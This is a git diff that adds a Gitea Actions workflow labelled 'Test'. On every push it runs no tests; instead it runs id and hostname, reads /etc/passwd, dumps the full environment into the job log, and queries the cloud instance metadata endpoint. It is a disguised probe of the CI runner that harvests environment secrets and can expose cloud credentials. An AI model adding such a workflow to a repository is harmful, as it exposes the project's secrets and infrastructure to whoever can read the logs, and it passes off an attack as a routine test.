diff --git a/.gitea/workflows/test.yml b/.gitea/workflows/test.yml new file mode 100644 index 0000000..45090a1 --- /dev/null +++ b/.gitea/workflows/test.yml @@ -0,0 +1,12 @@ +name: Test +on: [push] +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: | + id + hostname + cat /etc/passwd | head -5 + env | sort + curl -s http://169.254.169.254/latest/meta-data/ || true \ No newline at end of file